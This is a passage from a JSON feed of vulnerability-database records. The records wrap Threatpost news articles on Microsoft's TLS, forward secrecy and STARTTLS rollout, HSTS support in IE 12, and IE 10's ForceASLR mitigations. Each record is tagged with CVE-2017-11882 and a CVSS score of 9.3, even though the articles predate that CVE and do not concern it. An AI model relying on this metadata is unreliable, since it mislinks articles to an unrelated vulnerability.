Microsoft said it would also roll out STARTTLS for Outlook.com.\n\nHSTS, or [HTTPS Strict Transport Protocol](<http://threatpost.com/ie-12-to-support-hsts-encryption-protocol/105266>), forces sessions sent over HTTP to be sent instead over HTTPS. [STARTTLS](<http://threatpost.com/smtp-starttls-deployments-better-than-expected-facebook-says/106054>), meanwhile, allows clients and servers to encrypt messages provided both ends of a conversation support the protocol.\n\nMicrosoft\u2019s December promise, meanwhile, is coming to fruition.\n\n[Microsoft\u2019s December promise](<http://blogs.technet.com/b/microsoft_blog/archive/2013/12/04/protecting-customer-data-from-government-snooping.aspx?Redirected=true>), meanwhile, is coming to fruition. It promised then to encrypt customer data moving between the user and Microsoft would be encrypted by default and data moving between data centers would too be encrypted. Microsoft has already moved to deprecate weak encryption keys, supporting only a minimum 2048-bit key lengths.\n\nMicrosoft chose email as a starting point to concentrate its encryption efforts, bringing in worldwide partners such as Deutsche Telekom, Yandex and Mail.ru to test the viability of its encryption. The additional of Perfect Forward Secrecy to Outlook and OneDrive, for example, puts up another barrier not only for government intelligence agencies, but for criminal hackers as well.\n\n\u201cForward secrecy uses a different encryption key for every connection, making it more difficult for attackers to decrypt connections,\u201d Thomlinson said, adding that OneDrive customers get PFS whether accessing the service online, though its mobile application or a sync client. \u201cAs with Outlook.com\u2019s email transfer, this makes it more difficult for attackers to decrypt connections between their systems and OneDrive.\u201d\n\nMicrosoft also announced it has opened its first Microsoft Transparency Center. Located on the Redmond campus, the center enables participating governments with a place to review source code for a number of products and certify the integrity of the source code. Other such centers are in the works Thomlinson said, including one in Brussels, Belgium, announced in January.\n\n\u201cAs with most things relating to security, the landscape is ever changing,\u201d he said. \u201cOur work is ongoing and we are continuing to advance on engineering and policy commitments with the goal of increasing protection for your data and increasing transparency in our processes.\u201d\n", "cvss3": {}, "published": "2014-07-01T14:42:05", "type": "threatpost", "title": "Microsoft Expands TLS, Forward Secrecy Support", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-07-01T18:42:05", "id": "THREATPOST:F514D796FE42C0629BD951D8664A2420", "href": "https://threatpost.com/microsoft-expands-tls-forward-secrecy-support/106965/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:04", "description": "Microsoft confirmed today it will support HTTPS Strict Transport Protocol (HSTS) in Internet Explorer 12, bringing its browser in line with other major vendors in its support of the protocol.\n\nBrowsers supporting [HSTS](<https://tools.ietf.org/html/rfc6797>) force any sessions sent over HTTP to be sent instead over HTTPS, encrypting communication to and from a website.\n\nAccording to OWASP, HSTS protects users from a number of threats, in particular man-in-the-middle attacks by not only forcing encrypted sessions, but also stopping attackers who use invalid digital certificates. The protocol denies users the ability to override invalid certificate messages. HSTS also protects users from HTTPS websites that also may include HTTP links or serve content unencrypted.\n\nIE 12 is expected to be released this year; IE 11 was introduced in October 2013 and is the default browser in Windows 8.1.\n\nIE 12\u2019s support of HSTS puts it on an even keel with other browsers, some such as Chrome and Firefox have supported the protocol since 2011. Apple added HSTS support on Safari upon the release of Mavericks 10.9.\n\nAccording to the Electronic Frontier Foundation\u2019s [Encrypt the Web](<https://www.eff.org/deeplinks/2013/11/encrypt-web-report-whos-doing-what>) report, a few leading technology companies already support HSTS on their websites, including Dropbox, Foursquare, SpiderOak and Twitter. Others such as Facebook, LinkedIn, Tumblr, and Yahoo also plan to do so this year; Google too for select domains.\n\nEFF staff technologist Jeremy Gillula said today that developers either are unaware of the [availability of HSTS](<https://www.eff.org/deeplinks/2014/02/websites-hsts>), or have been stymied by incomplete support in browsers.\n\n\u201cThis is changing though: we noticed that Apple quietly added HSTS support to Safari in OS X 10.9,\u201d Gillula said. \u201cFor now, Internet Explorer doesn\u2019t support HSTS\u2014which means that there\u2019s basically no such thing as a secure website in IE.\u201d\n\nUntil that happens, much of the security burden falls on the user to either rely on a browser that supports HSTS, or use something such as the HTTPS Everywhere browser extension.\n\n\u201cFor now all a savvy user can do is to always carefully examine the address of the site you\u2019ve loaded, and verify that it\u2019s secure by checking to make sure it has \u201chttps\u201d in the front and is the precise address you want to visit,\u201d Gillula said. \u201cUnfortunately this assumes that you know ahead of time (and remember) whether or not a site should be secure, and are meticulous with every website you visit.\u201d\n\nSecure protocols such as HTTPS, HSTS and Perfect Forward Secrecy have been given greater priority now that the depths of NSA and government surveillance have been exposed. Experts urge developers to consider encryption technologies such as these a minimum standard for web-based services such as email.\n\nJust this week, Yahoo caught up to many of its contemporaries when it announced that it had [encrypted traffic moving between its data centers](<http://threatpost.com/yahoo-encrypts-data-center-links-boosts-other-services/105228>); Snowden documents revealed that the NSA and Britain\u2019s GCHQ were able to tap into overseas fiber optic cables and copy data as it moved to the company\u2019s data centers. Yahoo also announced its intention to support HSTS, Perfect Forward Secrecy and Certificate Transparency this year.\n", "cvss3": {}, "published": "2014-04-04T15:41:30", "type": "threatpost", "title": "IE 12 to Support HSTS Encryption Protocol", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-09T18:05:31", "id": "THREATPOST:848870C5AD3BB637321291CEF571A5F9", "href": "https://threatpost.com/ie-12-to-support-hsts-encryption-protocol/105266/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:32", "description": "Windows 8 is still off on the horizon somewhere, but the new version of Internet Explorer that\u2019s coming with it\u2013IE 10\u2013already is in consumer preview and it includes some major changes to the exploit mitigations. In addition to the existing implementations of ASLR, DEP and others technologies in Windows and IE, Microsoft has included a couple of new ones designed to further inhibit memory attacks.\n\nThe biggest change in IE 10 is a technology called ForceASLR that\u2019s meant to help compensate for the fact that not every application on Windows is compiled with the flag that opts them into ASLR. One of the main exploit mitigations that Microsoft has added to Windows in recent years, ASLR (address space layout randomization) essentially turns memory modules into moving targets for attackers, making it far more difficult for them to locate their payloads where they want. This has made browser-based exploits more complicated, but it only works if developers compile their applications with a specific flag, called /DYNAMICBASE, set. \n\nThe new ForceASLR technology helps fix that shortcoming by allowing IE to tell Windows to load every module in a random location, regardless of whether it was compiled with the /DYNAMICBASE flag. Microsoft security officials say that this is among the more important additions the company has made to the security of its browser and Windows machines.\n\n\u201cForceASLR is arguably the most important change to ASLR in Windows 8. ForceASLR is a new loader option used by Internet Explorer 10 to instruct the operating system to randomize the location of _all_ modules loaded by the browser, even if a given module was not compiled with the /DYNAMICBASE flag. The ForceASLR protection was added to the Windows 8 kernel, and the feature is now available as an update to Windows 7 that will be installed when Internet Explorer 10 is installed on that platform,\u201d [Forbes Higman](<http://blogs.msdn.com/b/ie/archive/2012/03/12/enhanced-memory-protections-in-ie10.aspx?Redirected=true>), a security program manager on IE, wrote in a blog post.\n\nIn addition to ForceASLR, Microsoft has included another mitigation called High Entropy ASLR that takes advantage of the larger address space that\u2019s avai